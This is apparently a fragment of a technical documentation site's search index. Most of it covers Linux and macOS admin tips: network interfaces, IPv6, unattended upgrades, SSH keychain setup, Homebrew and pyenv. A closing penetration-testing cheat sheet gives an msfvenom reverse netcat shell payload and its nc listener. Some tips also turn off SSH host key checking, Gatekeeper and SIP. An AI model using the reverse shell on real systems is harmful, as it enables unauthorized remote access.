", "tags": ["linux", "network"]}, {"location": "linux/Network/identify-nics/#the-solution", "title": "The Solution", "text": "ethtool
tool can be used to identify the physical network interface corresponding to a network interface name.
For this method to work, you need a physical access
to host's network cards and the physical network interfaces should have Led indicator
lights.
Note
This functionality of ethtool may not be supported by all server or network card hardware.
ethtool
usually isn't installed by default on a linux host. You can install it by running the following command (debian example):
apt install ethtool\n
Find the network interfaces present on the host and run the following command for each network interface:
ip addr\n
or
ifconfig -a\n
Now you can use the ethtool
command to identify the physical network interface corresponding to the network interface name.
Example for eth0
network interface name:
ethtool --identify eth0\n
This command will run until you stop it. When it's running, you should see the LED indicator light blinking
(usually orange) on the physical network interface corresponding to the network interface name.
To get information about the hardware capabilities of the network interface:
ethtool eth0\n
output example:
ethtool enp12s0f4\n\nSettings for enp12s0f4:\n Supported ports: [ FIBRE ]\nSupported link modes: 1000baseT/Full\n 10000baseT/Full\n Supported pause frame use: Symmetric Receive-only\n Supports auto-negotiation: No\n Supported FEC modes: None\n Advertised link modes: 10000baseT/Full\n Advertised pause frame use: Symmetric\n Advertised auto-negotiation: No\n Advertised FEC modes: None\n Link partner advertised link modes: Not reported\n Link partner advertised pause frame use: Symmetric\n Link partner advertised auto-negotiation: No\n Link partner advertised FEC modes: None\n Speed: 10000Mb/s\n Duplex: Full\n Auto-negotiation: off\n Port: Direct Attach Copper\n PHYAD: 255\nTransceiver: internal\n Current message level: 0x000000ff (255)\ndrv probe link timer ifdown ifup rx_err tx_err\n Link detected: yes\n
", "tags": ["linux", "network"]}, {"location": "linux/ubuntu-debian/disable-ipv6/", "title": "Disable IPv6 on Ubuntu and Debian Linux Permanently", "text": "By default, Ubuntu/Debian IPv6 is enabled after installation. This means that the IPv6 stack is active and the host can communicate with other hosts on the same network via IPv6 protocol.
You can disable IPv6 on Ubuntu/Debian by editing the /etc/default/grub
file.
nano /etc/default/grub\n
add ipv6.disable=1
to the end of GRUB_CMDLINE_LINUX_DEFAULT
and GRUB_CMDLINE_LINUX
line. Don't change the other values at those lines.
GRUB_CMDLINE_LINUX_DEFAULT=\"ipv6.disable=1\"\nGRUB_CMDLINE_LINUX=\"ipv6.disable=1\"\n
The config should look like this:
Update the grub configuration.
update-grub\n
Save and exit. Reboot
to apply the changes.
", "tags": ["ubuntu", "debian", "ipv6"]}, {"location": "linux/ubuntu-debian/free-port-53/", "title": "Free Port 53 on Ubuntu", "text": "", "tags": ["Ubuntu", "dns"]}, {"location": "linux/ubuntu-debian/free-port-53/#whats-using-port-53", "title": "What's Using Port 53?", "text": "When you install Ubuntu (in my case its Server version). It uses systemd-resolved as internal DNS Forwarder.
systemd-resolved is a system service that provides network name resolution to local applications. It implements a caching and validating DNS/DNSSEC stub resolver, as well as an LLMNR resolver and responder.
", "tags": ["Ubuntu", "dns"]}, {"location": "linux/ubuntu-debian/free-port-53/#how-to-free-port-53-on-ubuntu", "title": "How to Free Port 53 on Ubuntu", "text": "If we want to use port 53 for other purposes, we need to free it for example a Pihole DNS
server.
We can do it with the following commands:
sudo sed -r -i.orig 's/#?DNSStubListener=yes/DNSStubListener=no/g' /etc/systemd/resolved.conf\nsudo sh -c 'rm /etc/resolv.conf && ln -s /run/systemd/resolve/resolv.conf /etc/resolv.conf'\nsudo systemctl restart systemd-resolved\n
", "tags": ["Ubuntu", "dns"]}, {"location": "linux/ubuntu-debian/remove-snap-store/", "title": "Remove Snap Store from Ubuntu", "text": "", "tags": ["ubuntu"]}, {"location": "linux/ubuntu-debian/remove-snap-store/#what-is-snap", "title": "What Is Snap?", "text": "Snap is a cross-platform packaging and deployment system developed by Canonical, the makers of Ubuntu, for the Linux platform. It's compatible with most major Linux distros, including Ubuntu, Debian, Arch Linux, Fedora, CentOS, and Manjaro.
", "tags": ["ubuntu"]}, {"location": "linux/ubuntu-debian/remove-snap-store/#how-to-remove-snap-store", "title": "How To Remove Snap Store", "text": "sudo rm -rf /var/cache/snapd/\nsudo apt autoremove --purge snapd gnome-software-plugin-snap\nsudo rm -rf ~/snap\n
", "tags": ["ubuntu"]}, {"location": "linux/ubuntu-debian/unattended-upgrades/", "title": "Unattended Upgrades", "text": "sudo apt install -y unattended-upgrades apt-listchanges\n
Edit the config to your preference
sudo nano /etc/apt/apt.conf.d/50unattended-upgrades\n
Example
UbuntuDebian/RaspberyOS Unattended-Upgrade::Allowed-Origins {\n\"${distro_id}:${distro_codename}\";\n\"${distro_id}:${distro_codename}-security\";\n// Extended Security Maintenance; doesn't necessarily exist for\n// every release and this system may not have it installed, but if\n// available, the policy for updates is such that unattended-upgrades\n// should also install from here by default.\n\"${distro_id}ESMApps:${distro_codename}-apps-security\";\n\"${distro_id}ESM:${distro_codename}-infra-security\";\n\"${distro_id}:${distro_codename}-updates\";\n\"${distro_id}:${distro_codename}-proposed\";\n// \"${distro_id}:${distro_codename}-backports\";\n};\n\nUnattended-Upgrade::DevRelease \"auto\";\nUnattended-Upgrade::AutoFixInterruptedDpkg \"true\";\nUnattended-Upgrade::MinimalSteps \"true\";\nUnattended-Upgrade::InstallOnShutdown \"false\";\n//Unattended-Upgrade::Mail \"\";\n//Unattended-Upgrade::MailReport \"on-change\";\nUnattended-Upgrade::Remove-Unused-Kernel-Packages \"true\";\nUnattended-Upgrade::Remove-New-Unused-Dependencies \"true\";\nUnattended-Upgrade::Remove-Unused-Dependencies \"true\";\nUnattended-Upgrade::Automatic-Reboot \"true\";\nUnattended-Upgrade::Automatic-Reboot-WithUsers \"true\";\nUnattended-Upgrade::Automatic-Reboot-Time \"06:00\";\n//Acquire::http::Dl-Limit \"70\";\n// Unattended-Upgrade::SyslogEnable \"false\";\n// Unattended-Upgrade::SyslogFacility \"daemon\";\n// Unattended-Upgrade::OnlyOnACPower \"true\";\n// Unattended-Upgrade::Skip-Updates-On-Metered-Connections \"true\";\n// Unattended-Upgrade::Verbose \"false\";\n// Unattended-Upgrade::Debug \"false\";\n// Unattended-Upgrade::Allow-downgrade \"false\";\n
Unattended-Upgrade::Origins-Pattern {\n// Codename based matching:\n// This will follow the migration of a release through different\n// archives (e.g. from testing to stable and later oldstable).\n// Software will be the latest available for the named release,\n// but the Debian release itself will not be automatically upgraded.\n\"origin=Debian,codename=${distro_codename}-updates\";\n// \"origin=Debian,codename=${distro_codename}-proposed-updates\";\n\"origin=Debian,codename=${distro_codename},label=Debian\";\n\"origin=Debian,codename=${distro_codename},label=Debian-Security\";\n\n// Archive or Suite based matching:\n// Note that this will silently match a different release after\n// migration to the specified archive (e.g. testing becomes the\n// new stable).\n// \"o=Debian,a=stable\";\n// \"o=Debian,a=stable-updates\";\n// \"o=Debian,a=proposed-updates\";\n// \"o=Debian Backports,a=${distro_codename}-backports,l=Debian Backports\";\n};\n\nUnattended-Upgrade::DevRelease \"auto\";\nUnattended-Upgrade::AutoFixInterruptedDpkg \"true\";\nUnattended-Upgrade::MinimalSteps \"true\";\nUnattended-Upgrade::InstallOnShutdown \"false\";\n//Unattended-Upgrade::Mail \"\";\n//Unattended-Upgrade::MailReport \"on-change\";\nUnattended-Upgrade::Remove-Unused-Kernel-Packages \"true\";\nUnattended-Upgrade::Remove-New-Unused-Dependencies \"true\";\nUnattended-Upgrade::Remove-Unused-Dependencies \"true\";\nUnattended-Upgrade::Automatic-Reboot \"true\";\nUnattended-Upgrade::Automatic-Reboot-WithUsers \"true\";\nUnattended-Upgrade::Automatic-Reboot-Time \"06:00\";\n// Acquire::http::Dl-Limit \"70\";\n// Unattended-Upgrade::SyslogEnable \"false\";\n// Unattended-Upgrade::SyslogFacility \"daemon\";\n// Unattended-Upgrade::OnlyOnACPower \"true\";\n// Unattended-Upgrade::Skip-Updates-On-Metered-Connections \"true\";\n// Unattended-Upgrade::Verbose \"false\";\n// Unattended-Upgrade::Debug \"false\";\n// Unattended-Upgrade::Allow-downgrade \"false\";\n
Automatic call via /etc/apt/apt.conf.d/20auto-upgrades
echo unattended-upgrades unattended-upgrades/enable_auto_updates boolean true | sudo debconf-set-selections\nsudo dpkg-reconfigure -f noninteractive unattended-upgrades\n
Check the /etc/apt/apt.conf.d/20auto-upgrades for those 2 lines:
APT::Periodic::Update-Package-Lists \"1\";\nAPT::Periodic::Unattended-Upgrade \"1\";\n
Manual Run:
sudo unattended-upgrade -d\n
To enable unattended-upgrade use the following command:
sudo dpkg-reconfigure --priority=low unattended-upgrades\n
", "tags": ["ubuntu"]}, {"location": "mac-os/applications-tweaks/", "title": "Applications Tweaks", "text": "", "tags": ["macOS"]}, {"location": "mac-os/applications-tweaks/#running-multi-instances-of-an-application", "title": "Running Multi Instances of an Application", "text": "Launch the Script Editor choose temporary folder
Copy the command to be executed to the Script Editor
do shell script \"open -n <path to application>\"\n
Example
do shell script \"open -n /Applications/'Visual Studio Code.app'\"
File > Export
Use the following settings:
Export As: Your New Application Name Where: Applications File Format: Application Change The Icon of Your New Application:
In Finder go to the Applications folder. Right Click on the new Your New Application application we just created and click Get Info. Drag the original application icon (or any other) to the icon in the left corner of the \"get info\" menu.
", "tags": ["macOS"]}, {"location": "mac-os/applications-tweaks/#lunch-firefox-profile-manager-as-application", "title": "Lunch Firefox Profile Manager as Application", "text": "Launch the Script Editor choose temporary folder
Copy the command to be executed to the Script Editor
do shell script \"/Applications/Firefox.app/Contents/MacOS/firefox -ProfileManager &> /dev/null &\"\n
File > Export
Use the following settings:
Save As: Firefox Profile Manager Where: Applications File Format: Application Change The Icon of Your New Firefox Profile Manager Application:
In Finder go to the Applications folder. Right Click on the new Firefox Profile Manager application we just created and click Get Info. Drag the original application to the icon in the left corner of the \"get info\" menu.
", "tags": ["macOS"]}, {"location": "mac-os/enable-root-user/", "title": "Enable or Disable the Root User on macOS", "text": "Mac administrators can use the root user account to perform tasks that require access to more areas of the system.
The user account named \u201droot\u201d is a superuser with read and write privileges to more areas of the system, including files in other macOS user accounts. The root user is disabled by default. If you can log in to your Mac with an administrator account, you can enable the root user, then log in as the root user to complete your task.
", "tags": ["macOS"]}, {"location": "mac-os/enable-root-user/#how-to-enable-the-root-user", "title": "How to Enable the Root User", "text": "System Preferences
> Users & Groups
Click lock
icon, enter an administrator name and password. Click Login Options
. Click Join
at Network Account Server
.
Click Open Directory Utility
.
Click lock icon in the Directory Utility window, then enter an administrator name and password.
From the menu bar in Directory Utility: Choose Edit > Enable Root User, then enter the password that you want to use for the root user. Or choose Edit > Disable Root User.
", "tags": ["macOS"]}, {"location": "mac-os/enable-root-user/#how-to-disable-the-root-user", "title": "How to Disable the Root User", "text": "To Disable the Root User repeat the steps above, but change the last step to Disable Root User.
", "tags": ["macOS"]}, {"location": "mac-os/enable-root-user/#login-as-the-root-user", "title": "Login as The Root User", "text": "When the root user is enabled, you have the privileges of the root user only while logged in as the root user.
Logout of your current account, then log in as the root user. user name \u201droot\u201d and the password you created for the root user.
", "tags": ["macOS"]}, {"location": "mac-os/import-ssh-keys-keychain/", "title": "Import ed25519/RSA Keys Passphrase to macOS Keychain", "text": "First, you need to add the keys to the keychain
with the following steps:
Copy your ed25519, ed25519.pub
/ id_rsa, id_rsa.pub
to ~/.ssh/
folder
Store the key in the MacOS Keychain
ed25519 KeyRSA Key ssh-add --apple-use-keychain ~/.ssh/ed25519\n
ssh-add --apple-use-keychain ~/.ssh/id_rsa\n
Enter your key passphrase. You won't be asked for it again.
List all keys in the keychain:
ssh-add -l\n
", "tags": ["macos"]}, {"location": "mac-os/import-ssh-keys-keychain/#configure-ssh-to-always-use-the-keychain", "title": "Configure SSH to always use the keychain", "text": "If you haven't already, create an ~/.ssh/config
file. In other words, in the .ssh directory in your home dir, make a file called config.
At ~/.ssh/config
file, add the following lines at the top of the config:
Store the key in the MacOS Keychain
For ed25519 KeyFor RSA Key Host *\n UseKeychain yes\n AddKeysToAgent yes\n IdentityFile ~/.ssh/id_ed25519\n
Host *\n UseKeychain yes\n AddKeysToAgent yes\n IdentityFile ~/.ssh/id_rsa\n
The UseKeychain yes is the key part, which tells SSH to look in your macOS keychain for the key passphrase.
That's it! Next time you load any ssh connection, it will try the private keys you've specified, and it will look for their passphrase in the macOS keychain. No passphrase typing required.
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/", "title": "Terminal Snippets", "text": "Terminal usage snippets for macOS. This is a collection of snippets that I use without specific category.
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#install-macos-updates-via-cli", "title": "Install macOS Updates via CLI", "text": "softwareupdate -i -a\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#install-command-line-tools", "title": "Install Command Line Tools", "text": "xcode-select --install\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#shell-safe-rm", "title": "Shell Safe rm", "text": "Source shell-safe-rm github
A much safer replacement of shell rm
with ALMOST FULL features of the origin rm
command.
Initially developed on Mac OS X, then tested on Linux.
Using safe-rm
, the files or directories you choose to remove will move to $HOME/.Trash
instead of simply deleting them. You could put them back whenever you want manually.
If a file or directory with the same name already exists in the Trash, the name of newly-deleted items will be ended with the current date and time.
Install with npm:
npm i -g safe-rm\n
Add Alias to your zshrc config
alias rm='safe-rm'\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#disable-stricthostkeychecking-in-ssh", "title": "Disable StrictHostKeyChecking in SSH", "text": "To disable strict host checking on OS X for the current user, create or edit ~/.ssh/ssh_config
and add the following lines:
StrictHostKeyChecking no\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#set-macos-hostname-via-cli", "title": "Set macOS Hostname via CLI", "text": "sudo scutil --set HostName <NewHostNameHere>\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#syntax-highlighting-for-nano", "title": "Syntax Highlighting for Nano", "text": "Install Nano from homebrew Create ~/.nanorc
file with the syntax below
brew install nano\ntouch ~/.nanorc\n
Edit ~/.nanorc
file with the syntax below
M1 (ARM)Intel Based echo 'include \"/opt/homebrew/share/nano/*.nanorc\"' >> ~/.nanorc\n
echo 'include \"/usr/local/share/nano/*.nanorc\"' >> ~/.nanorc\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#disableenable-gatekeeper", "title": "Disable/Enable Gatekeeper", "text": "Disable Gatekeeper
sudo spctl --master-disable\n
Enable Gatekeeper
sudo spctl --master-enable\n
Check Status
spctl --status\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#disableenable-sip-system-integrity-protection", "title": "Disable/Enable SIP (System Integrity Protection)", "text": "Reboot your Mac into Recovery Mode by restarting your computer and holding down Command+R until the Apple logo appears on your screen. Click Utilities > Terminal. In the Terminal window, type in:
Status:
csrutil status\n
Disable:
csrutil disable\n
Enable:
csrutil enable\n
Press Enter and restart your Mac.
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#installing-rbenv-ruby-send-box-ruby-alternative-to-the-one-that-macos-uses", "title": "Installing rbenv (ruby send box) - Ruby alternative to the one that macOS uses", "text": "Install rbenv with brew
brew install rbenv\n
Add eval \"$(rbenv init -)\"
to the end of ~/.zshrc
or ~/.bash_profile
Install a ruby version
rbenv install 2.3.1\n
Select a ruby version by rbenv
rbenv global 2.3.1\n
Open a new terminal window
Verify that the right gem folder is being used with gem env home
(should report something in your user folder not system wide)
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#list-listening-ports-and-programs-and-users-netstat-like", "title": "List listening Ports and Programs and Users (netstat like)", "text": "sudo lsof -i -P | grep -i \"listen\"\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#disable-last-login-at-terminal", "title": "Disable \"last login\" at Terminal", "text": "cd ~/\ntouch .hushlogin\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#fix-missing-usersshared-folder", "title": "Fix Missing /Users/Shared Folder", "text": "Create he missing /Users/Shared folder
sudo mkdir -p /Users/Shared/\n
Fix permissions for the /Users/Shared folder
sudo chmod -R 1777 /Users/Shared\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#iterm2", "title": "iTerm2", "text": "Using Alt/Cmd + Right/Left Arrow in iTerm2
Go to iTerm Preferences
\u2192 Profiles
, select your profile, then the Keys
tab. click Load Preset
... and choose Natural Text Editing
.
Remove the Right Arrow Before the Cursor Line
you can turn it off by going in to Preferences
> Profiles
> (your profile) > Terminal
, scroll down to Shell Integration
, and turn off Show mark indicators
.
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#clear-google-drive-cache", "title": "Clear Google Drive cache", "text": "rm -rf ~/Library/Application\\ Support/Google/DriveFS/[0-9]*\n
", "tags": ["macos"]}, {"location": "mac-os/touch-id-for-sudo/", "title": "TouchID for sudo", "text": "Apple devices such Macbooks and some Apple Magic Keyboards have a fingerprint - Touch ID scanner that can be used to authenticate a user with a touch of a finger. This functionality isn't available when using sudo
to run commands. You have to enter your password every time you run commands with high privileges.
We can enable TouchID for sudo with a simple config change. This will allow you to use Touch ID to authenticate with sudo
without entering your password including the authentication with Apple Watch.
Display Link - Known Issue
As of the writing of this article, the Display Link Driver will prevent the use of Touch ID for sudo when using the Display Link device. It will work when the Display Link device isn't connected. This is a known issue.
", "tags": ["macOS", "iTerm2", "terminal", "touchID"]}, {"location": "mac-os/touch-id-for-sudo/#enable-touchid-for-sudo", "title": "Enable TouchID for sudo", "text": "Open in text editor file with sudo privileges /etc/pam.d/sudo
. In the next example we will use the nano
editor.
sudo nano /etc/pam.d/sudo\n
Add at the top of the config file this line:
auth sufficient pam_tid.so\n
Your config should look like this:
Save and Exit.
You can test your TouchID prompt in terminal by opening new session and running:
sudo -l\n
", "tags": ["macOS", "iTerm2", "terminal", "touchID"]}, {"location": "mac-os/touch-id-for-sudo/#enable-touchid-support-in-iterm2", "title": "Enable TouchID Support in iTerm2", "text": "In order to enable TouchID support in iTerm2, you need to complete the above section and then follow the steps below:
Go to iTerm2
-> Preferences
-> Advanced
and search for:
Allow session to survive\n
Change Allow session to survive logging out and back in. to No
You can test your TouchID prompt in iTerm2 by opening new session and running:
sudo -l\n
", "tags": ["macOS", "iTerm2", "terminal", "touchID"]}, {"location": "mac-os/ui-tweaks/", "title": "UI Tweaks", "text": "", "tags": ["macOS"]}, {"location": "mac-os/ui-tweaks/#hide-all-the-icons-on-your-desktop", "title": "Hide All The Icons On Your Desktop", "text": "Disable Icons:
defaults write com.apple.finder CreateDesktop false\nkillall Finder\n
Enable Icons:
defaults write com.apple.finder CreateDesktop true\nkillall Finder\n
", "tags": ["macOS"]}, {"location": "mac-os/ui-tweaks/#change-the-launchpad-grid-layout", "title": "Change the Launchpad Grid Layout", "text": "Change the springboard-columns and springboard-rows values according to your preference
defaults write com.apple.dock springboard-columns -int 8\ndefaults write com.apple.dock springboard-rows -int 6\ndefaults write com.apple.dock ResetLaunchPad -bool TRUE\nkillall Dock\n
", "tags": ["macOS"]}, {"location": "mac-os/ui-tweaks/#reset-launchpad-icons-sort", "title": "Reset Launchpad Icons Sort", "text": "defaults write com.apple.dock ResetLaunchPad -bool true; killall Dock\n
", "tags": ["macOS"]}, {"location": "mac-os/ui-tweaks/#set-the-same-view-options-for-all-finder-windows", "title": "Set the Same View Options
for all Finder windows", "text": "First, we want to set the default view options for all new Finder windows. To do so, open Finder and click on the view setting that you want to use. The settings are four icons and the top of your Finder window. If you don't see the Finder toolbar type:
cmd + option + t\n
After selecting the option you want, type:
cmd + j\n
to open the view options window.
Make sure you check the top two checkboxes that say Always open in list view and Browse in list view. Keep in mind it will reflect whichever view you've selected.
Now click the button at the bottom that says \"Use as Defaults\".
", "tags": ["macOS"]}, {"location": "mac-os/ui-tweaks/#delete-all-ds_store-files-on-your-computer", "title": "Delete all .DS_Store files on your computer", "text": "Chances are you've opened some Finder windows in the past. Individual folder options will override this default setting that we just set.
In order reset your folder settings across the entire machine we have to delete all .DS_Store files. This will ensure that all folders start fresh. Open up the Terminal application (Applications/Utilities/Terminal), and type:
sudo find / -name .DS_Store -delete 2>/dev/null ; killall Finder\n
Note: In the future, whenever you switch views, it will automatically save in the new .DS_Store file. This will override the default settings.
", "tags": ["macOS"]}, {"location": "mac-os/homebrew/brewup/", "title": "BrewUp", "text": "", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/brewup/#description", "title": "Description", "text": "Brewup script is a Bash script that uses Homebrew - The Missing Package Manager for macOS as it's base. Brewup uses GitHub as a \"backup\" of a config file which contains all installed Taps, Formulas, Casks and App Store Apps at your macOS. It also allows the use of Github main function of retaining changes so you can always look up for the package that were installed sometime ago and you just forgot what is was exactly.
Visit us at 3os.org for more guides and tips for macOS
", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/brewup/#what-brewup-actually-does", "title": "What Brewup Actually Does", "text": "It just runs few Brew functionality automatically:
brew doctor brew missing brew upgrade brew cask upgrade brew cleanup App Store Updates Creating Updated Brewfile Pushing changes to Git ", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/brewup/#requirements", "title": "Requirements", "text": " Homebrew The missing package manager for macOS git (with active account) Mas, terminal-notifier, coreutils (will be installed if missing at the first script execution) ", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/brewup/#installing", "title": "Installing", "text": "Use this repository as template, it will create a Fork
for you and you can start using it.
git clone <paste the your repo url here>\n
sudo ln -s ${PWD}/BrewUp/brewup.sh /usr/local/bin/brewup\n
Note: if /usr/local/bin/
is missing create it with
sudo mkdir /usr/local/bin/\n
", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/brewup/#usage", "title": "Usage", "text": "just run from terminal:
brewup\n
Install all apps from BrewFile:
cd to local location you cloned your repository and run:
brew bundle install --file=<BrewFile Name>\n
", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/brewup/#license", "title": "License", "text": "", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/brewup/#mit-license", "title": "MIT License", "text": "Copyright \u00a9 Stas Kosatuhin @2019
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/homebrew-snippets/", "title": "Brew Snippets", "text": "", "tags": ["macOS", "homebrew"]}, {"location": "mac-os/homebrew/homebrew-snippets/#brew-pinns-freez-and-unfreez-specific-packages", "title": "Brew Pinns - Freez and Unfreez Specific Packages", "text": "This will alow you to pin (freez update) to specific packages to your Homebrew installation and then unfreeze them.
List of packages that you freeze
brew list --pinned\n
Freeze Version
brew pin <formula>\n
Unfreeze Version
brew unpin <formula>\n
", "tags": ["macOS", "homebrew"]}, {"location": "mac-os/homebrew/homebrew-snippets/#uninstall-brew-package-and-dependencies", "title": "Uninstall Brew Package and Dependencies", "text": "Remove package's dependencies (does not remove package):
brew deps [FORMULA] | xargs brew remove --ignore-dependencies\n
Remove package:
brew remove [FORMULA]\n
Reinstall missing libraries:
brew missing | cut -d: -f2 | sort | uniq | xargs brew install\n
", "tags": ["macOS", "homebrew"]}, {"location": "mac-os/python/pyenv-virtualenv/", "title": "Pyenv-virtualenv - Multiple Version Python Virtual Environment Manager", "text": "For easy non-multiple version Python Virtual Environment follow this Venv Python Virtual Environment
", "tags": ["maco", "python"]}, {"location": "mac-os/python/pyenv-virtualenv/#intro", "title": "Intro", "text": "Using and developing with Python on macOS sometimes may be frustrating...
The reason for that is that macOS uses Python 2 for its core system with pip as a package manager. When Xcode Command Line Tools are installed Python 3 and pip3 package manager will be available at the cli. When using Python2, Python3 and their package managers this way, all the packages will be installed at the system level and my effect the native packages and their dependences , this can break or lead to unwanted bugs in OS.
The right way to use python at macOS is to use Virtual Environments for python. This way all the system related versions of python and their packages won't be affected and use by you.
", "tags": ["maco", "python"]}, {"location": "mac-os/python/pyenv-virtualenv/#installing-and-configuring-pyenv-pyenv-virtualenv", "title": "Installing and configuring pyenv, pyenv-virtualenv", "text": "In order to use pyenv, pyenv-virtualenv without conflicting with the native macOS python we need to add some configuration to our ~/.zshrc config (for mac os catalina) or your bash config if you are still using bash.
It's very imported to maintain the order of the configuration for the loading order
First of all we need to include your Executable Paths. In the example we added all the common paths, including the paths for pyenv, pyenv-virtualenv. If you have any other path that you use, you can add them at the same line or create a new line below this one. Second to Executable Paths we will add two if statements that will check if the pyenv,pyenv-virtualenv are installed, if they are it will load them. If they aren't and you are using the same zsh or bash config it will ignore loading them Third is a fix for brew, brew doctor. When using this method it may conflict with brew as it uses python as well. If you run run brew doctor without the fix, it will show config warnings related to the python configuration files. Configuration for ~/.zshrc or ~/.zprofile
# Executable Paths\n## Global\nexport PATH=\"/usr/local/bin:/usr/local/sbin:/Users/${USER}/.local/bin:/usr/bin:/usr/sbin:/bin:/sbin:$PATH\"\n\n## Curl\nexport PATH=\"/opt/homebrew/opt/curl/bin:$PATH\"\nexport LDFLAGS=\"-L/opt/homebrew/opt/curl/lib\"\nexport CPPFLAGS=\"-I/opt/homebrew/opt/curl/include\"\nexport PKG_CONFIG_PATH=\"/opt/homebrew/opt/curl/lib/pkgconfig\"\n\n# pyenv, pyenv-virtualenv\n## Initiating pyenv and fix Brew Doctor: \"Warning: \"config\" scripts exist outside your system or Homebrew directories\"\nif which pyenv >/dev/null; then\n eval \"$(pyenv init --path)\"\n alias brew='env PATH=${PATH//$(pyenv root)\\/shims:/} brew'\nfi\n\n## Initiating pyenv-virtualenv\nif which pyenv-virtualenv-init >/dev/null; then\n eval \"$(pyenv virtualenv-init -)\"\nfi\n
After you saved your configuration the best way to load it is to close your terminal session and open it again. This will load the session with your updated configuration. There should be no errors at the new session.
This will install both pyenv and pyenv-virtualenv
brew install pyenv-virtualenv\n
Test if pyenv loaded correctly
pyenv -v\n
After the installation we would like to set a system level python version, you can choose the default from the list available from the pyenv
List available Python Version and find the version suited for your needs:
pyenv install --list\n
Install Required Python Version (Example version 3.9.5) as a default system
pyenv install 3.9.5\n
Set it as global
pyenv global 3.9.5\n
You can install multiple versions of python at the same time.
List all installed python versions and virtual environments and their python versions
pyenv versions\n
Now let's test our system Python version we set before, it should be the version you chose as Global before
python -V\n
So far we cleaned your system and installed and configured pyenv, pyenv-virtualenv.
", "tags": ["maco", "python"]}, {"location": "mac-os/python/pyenv-virtualenv/#how-to-use-pyenv-virtualenv", "title": "How to use pyenv-virtualenv", "text": "Now let's understand how to use Python Virtual Environment with pyenv-virtualenv
Full documentation can be found at the original repo at git hub: pyenv-virtualenv github
We will list here some basic examples for a quick start and basic understanding
To create a virtualenv for the Python version used with pyenv, run pyenv virtualenv, specifying the Python version you want and the name of the virtualenv directory. For example,
pyenv virtualenv 3.9.5 my-project-name\n
This will create a virtualenv based on Python 3.9.5 under $(pyenv root)/versions in a folder called my-project-name
Activating virtualenv automatically for project
The best way we found to activate the virtualenv at your project is to link the projects directory to the virtualenv.
cd to the project's directory and link the virtualenv, for example the my-project-name virtualenv
pyenv local my-project-name\n
This will activate the linked virtualenv every time you cd to this directory automatically From now you can use pip to install any packages you need for your project, the location of the installed packages will be at $(pyenv root)/versions/
Activating virtualenv manually for project
You can also activate and deactivate a pyenv virtualenv manually:
pyenv activate <virtualenv name>\npyenv deactivate\n
This will allow you to use multiple versions of python or packages for the same project
List existing virtualenvs
pyenv virtualenvs\n
Delete existing virtualenv
pyenv uninstall my-virtual-env\n
or
pyenv virtualenv-delete my-virtual-env\n
You and your macOS should be ready for using python the right way without conflicting with any system or Xcode Command Line Tools (used by brew)
", "tags": ["maco", "python"]}, {"location": "penetration-testing/cheatsheets/cli-commands-collation/", "title": "Cli Commands Collation", "text": "", "tags": ["pt", "penetration-testing", "cli", "commands", "collation"]}, {"location": "penetration-testing/cheatsheets/cli-commands-collation/#find-ptr-owner-reversal-look-up", "title": "Find PTR Owner - Reversal Look Up", "text": "dig 0.168.192.in-addr.arpa. NS\n
", "tags": ["pt", "penetration-testing", "cli", "commands", "collation"]}, {"location": "penetration-testing/cheatsheets/cli-commands-collation/#listent-for-pingicmp-on-interface", "title": "Listent for Ping/icmp on interface", "text": "sudo tcpdump ip proto \\\\icmp -i eth0\n
", "tags": ["pt", "penetration-testing", "cli", "commands", "collation"]}, {"location": "penetration-testing/cheatsheets/cli-commands-collation/#reverse-netcat-shell", "title": "Reverse Netcat Shell", "text": "Payload R(row)
msfvenom -p cmd/unix/reverse_netcat lhost=10.11.19.49 lport=4444 R\n
listener:
nc -lvp 4444\n
", "tags": ["pt", "penetration-testing", "cli", "commands", "collation"]}, {"location": "penetration-testing/cheatsheets/cli-commands-collation/#nfs-show-mount", "title": "NFS Show Mount", "text": "showmount -e 10.10.87.232\n
